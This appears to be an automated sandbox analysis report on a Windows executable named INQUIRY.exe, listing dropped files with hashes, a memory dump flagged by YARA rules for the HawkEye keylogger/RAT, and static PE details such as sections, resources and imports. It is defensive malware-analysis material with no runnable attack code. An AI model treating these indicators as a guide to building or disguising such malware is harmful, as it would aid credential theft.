                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B0B.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456792166327963
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BN8fm8M4JFKg7Fi+q8v5mpJP6v4HcHOd:uITfT4aSNwJFK7K0vP6vMiOd
                                                                      MD5:18F66061D1D492E5837EDA572C603EF7
                                                                      SHA1:09D9099E03FF5F8A1A481E9C16C706253EF312C8
                                                                      SHA-256:40F6DA190C8F79EA3E49E49A4FF2165C43FDFA39C281EE54BEC83B22ABAD4810
                                                                      SHA-512:2D7BF15CE4CD127233CDF94E19D653B90D9E3CE4AA6DE49D145DC879CF3F7B4559D16F1D2B3118FAD5B7CE89279EB44B69F85F037D125FEB27E82BAAA80C3B97
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:53 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7023137
                                                                      Entropy (8bit):4.716145709461237
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYElKgNP5N9H5ZFx1r+VTJb1XacA8nLqYT3bXUyYjgtXSiqjoUt8MS:XbKgjN9HVsvVrttXS+
                                                                      MD5:727EDE66BE753BF43CC3BB8AD0424846
                                                                      SHA1:6D36C62C3F02AC08483F5C46ECAE760987320DCF
                                                                      SHA-256:790BA9AF55C3D758F27EF0D7863D6CB9A56EAFA041302FF6E05DD97CF97AC35F
                                                                      SHA-512:E96B87EEFC7CD22C841C78A61B34466AD208935E6ACAA741204F87FBBFCADA9B9EF12B6E3C4E9379491B5A6BEED83DA044D60F1774519197CFF5A50636035656
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T...........z)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3AF.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.7341230330284576
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiGR6OjGY0uuS8+prm89bkasfCCsm:RrlsNiY6DYPuS/k5fCo
                                                                      MD5:5D356EEFFF6F12474642A2400398FCD4
                                                                      SHA1:51D9FB907FDCABE46A83942DF50444C241FC8F63
                                                                      SHA-256:53E30E0481710B622CD95CFADFD2017035084D91E8EFDF6D2BF3EEDF642EF4F5
                                                                      SHA-512:B33ACA3565A56D25A75FB3D09CF4E818502C92DA36C13E3277076147DC05F9D9BEF1AAFFCD81E0A2F4831560579BAB3E2688DCB4EC723064BA3576CBEF39A17E
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6FC.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.511253263073843
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BF8fm8M4JOWjZFI+q89zApJP6v4HcHdd:uITfT4aSNkJOgEsAvP6vMidd
                                                                      MD5:4433E23608B8B2A3855C267846E81EA3
                                                                      SHA1:20A828E188264B443EC9BF44921A81DADFD4B472
                                                                      SHA-256:9632AC9115185AB53965AF43D06F0E22DC58CA6013D9DC82F82F636370757E73
                                                                      SHA-512:14C33EF3DA14C74ECEF7CDF5F79CA7C7F89415E714E06A2A5AC643B10BCE2714A44370694F8A69FC241D9547D50101F973E37CB27121CC454DD6865C33B7F751
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):7616
                                                                      Entropy (8bit):3.691270032301233
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiin6E6YPb6EgmfZtuvUubS7+p1ct1fAldUm:RrlsNia6E6Yj6EgmfSvvbSecvfer
                                                                      MD5:ACACA69C6A291286C08D46EDABFF5680
                                                                      SHA1:D7B1662B910D8FD7961E37DB9E444921E4639EA4
                                                                      SHA-256:8EEB4DDDCF0548A987BD4BF9FE0C06E0B2C14C390D2F0F99C49CD1C5C541F745
                                                                      SHA-512:A9EB6EE1080F61332325FA1A47A26C6351A3A070B88DDBBE280D70D3C6BE4BE18E3063E83954C8949A6236C251A3B2BD52CA3176A609F3F4C916890330EDEA01
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFF4.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.455540365553958
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8Bv8fm8M4JFKg7Fflm+q8v5UpJP6v4Hwd:uITfI4aSNCJFKcIKGvP6vMwd
                                                                      MD5:DF582E1905AE5003E6954E4AD881502D
                                                                      SHA1:CA58F2D441FEA0F0EDB1918239EA99A9E579DE90
                                                                      SHA-256:DA6CA008EF7A7B3630E4B663CB2A6E8CE38BCC4E32E7E416950FAB100EA1F2FB
                                                                      SHA-512:5BC1A1740FC49FB50052C08845A89BFC11D4B87A83AA0B5BFEFC4682A1F9C36F7F26548BF608BF22B78BE23A721C9620E4B2A1D917BF588FF7A2DBE285F716CF
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview: ..
                                                                      C:\Users\user\AppData\Roaming\pid.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):2.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Pd:F
                                                                      MD5:EFFC299A1ADDB07E7089F9B269C31F2F
                                                                      SHA1:6AFB24DE207D2E6952BA43F0E5B20BCDF0596CE5
                                                                      SHA-256:50E9A8665B62C8D68BCCC77C7C92431A1AA26CCBD38ED4BBA8DD7422A3A4AB70
                                                                      SHA-512:BD27269F95DA0217EE0999E12CC2AFC05882C559D55C1660095BB38A7D96ECB5F8210A919B24069C3FCC17CCDAA13844A75948314C74AAAC63B082DF196EA818
                                                                      Malicious:false
                                                                      Preview: 1364
                                                                      C:\Users\user\AppData\Roaming\pidloc.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):34
                                                                      Entropy (8bit):4.0989440037669045
                                                                      Encrypted:false
                                                                      SSDEEP:3:oNt+WfWsrmC:oNwvsr7
                                                                      MD5:4FA80C1B433C83F339F774D6347C74D8
                                                                      SHA1:B5F7CA62EFB43F9A32A112C991CE22C07A8908D2
                                                                      SHA-256:25E8C1425C844373EBE82F274167A8ADEA6581F5A4F3ABC6B5F4BD0E5AE80092
                                                                      SHA-512:514421997E148C08C2BEE3664F660BEAA500881D1683F2DC6680DA7B5038857A941691871129564402768970E4463883C17A3CB186B1CCB0DE82714633B7EECF
                                                                      Malicious:false
                                                                      Preview: C:\Users\user\Desktop\INQUIRY.exe

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.893502354967658
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      File name:INQUIRY.exe
                                                                      File size:1009664
                                                                      MD5:0b940145d7d02e5b1b975c99dd5197a4
                                                                      SHA1:53ae0b576f7b362b90a25ace1470d33068db4490
                                                                      SHA256:bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
                                                                      SHA512:f6ea131ca86752edd8163c27ba045ff8ab4fe90a92f923565496e99d8b46ba5e99af14660bcca127a1ff06246ca262456508f6f9de2462e4cd10ba53d1428a92
                                                                      SSDEEP:12288:Hl1aMljBMKnw6WJoGPb5FUoRAVyImHlawG0h/XWl2l+klp8OdH+0YxEGIN1QpZrj:jJCKxWfPNFwyIUlawt/3mwe0dn1QT
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:60c8d86cece67c70

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x479884
                                                                      Entrypoint Section:CODE
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:5113dec31b8616dbad783836e7188783

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00479694h
                                                                      call 00007F14C893661Dh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C89863DDh
                                                                      mov ecx, dword ptr [00495BC8h]
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [00479188h]
                                                                      call 00007F14C89863DDh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C8986451h
                                                                      call 00007F14C8934114h
                                                                      lea eax, dword ptr [eax+00h]

                                                                      Data Directories

                                                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x97000          0x24c4        .idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa4000          0x57324       .rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9c000          0x7f70        .reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x9b000          0x18          .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                      Sections

                                                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                      CODE    0x1000           0x788cc       0x78a00   False     0.524172198834   data       6.51448811653  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      DATA    0x7a000          0x1bc5c       0x1be00   False     0.171568455717   data       2.71109267168  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      BSS     0x96000          0xcb1         0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .idata  0x97000          0x24c4        0x2600    False     0.352076480263   data       4.94171972073  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .tls    0x9a000          0x10          0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .rdata  0x9b000          0x18          0x200     False     0.048828125      data       0.20058190744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .reloc  0x9c000          0x7f70        0x8000    False     0.559631347656   data       6.62495186635  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .rsrc   0xa4000          0x57324       0x57400   False     0.922672479405   data       7.57976248647  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      Name             RVA      Size     Type                                                    Language  Country
                                                                      RT_CURSOR        0xa4900  0x134    data
                                                                      RT_CURSOR        0xa4a34  0x134    data
                                                                      RT_CURSOR        0xa4b68  0x134    data
                                                                      RT_CURSOR        0xa4c9c  0x134    data
                                                                      RT_CURSOR        0xa4dd0  0x134    data
                                                                      RT_CURSOR        0xa4f04  0x134    data
                                                                      RT_CURSOR        0xa5038  0x134    data
                                                                      RT_BITMAP        0xa516c  0x1d0    data
                                                                      RT_BITMAP        0xa533c  0x1e4    data
                                                                      RT_BITMAP        0xa5520  0x1d0    data
                                                                      RT_BITMAP        0xa56f0  0x1d0    data
                                                                      RT_BITMAP        0xa58c0  0x1d0    data
                                                                      RT_BITMAP        0xa5a90  0x1d0    data
                                                                      RT_BITMAP        0xa5c60  0x1d0    data
                                                                      RT_BITMAP        0xa5e30  0x1d0    data
                                                                      RT_BITMAP        0xa6000  0x539f1  data                                                    English   United States
                                                                      RT_BITMAP        0xf99f4  0x1d0    data
                                                                      RT_BITMAP        0xf9bc4  0xd8     data
                                                                      RT_BITMAP        0xf9c9c  0xd8     data
                                                                      RT_BITMAP        0xf9d74  0xd8     data
                                                                      RT_BITMAP        0xf9e4c  0xd8     data
                                                                      RT_BITMAP        0xf9f24  0xd8     data
                                                                      RT_BITMAP        0xf9ffc  0xe8     GLS_BINARY_LSB_FIRST
                                                                      RT_ICON          0xfa0e4  0x668    data                                                    English   United States
                                                                      RT_DIALOG        0xfa74c  0x52     data
                                                                      RT_RCDATA        0xfa7a0  0x10     data
                                                                      RT_RCDATA        0xfa7b0  0x274    data
                                                                      RT_RCDATA        0xfaa24  0x7c3    Delphi compiled form 'TForm1'
                                                                      RT_GROUP_CURSOR  0xfb1e8  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR  0xfb1fc  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR  0xfb210  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR  0xfb224  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR  0xfb238  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR  0xfb24c  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR  0xfb260  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_ICON    0xfb274  0x14     data                                                    English   United States
                                                                      RT_HTML          0xfb288  0x99     data                                                    English   United States

                                                                      Imports

                                                                      DLL: Import
                                                                      kernel32.dll: DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                      user32.dll: GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                      advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      oleaut32.dll: SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                      kernel32.dll: TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                      advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      kernel32.dll: lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                      version.dll: VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
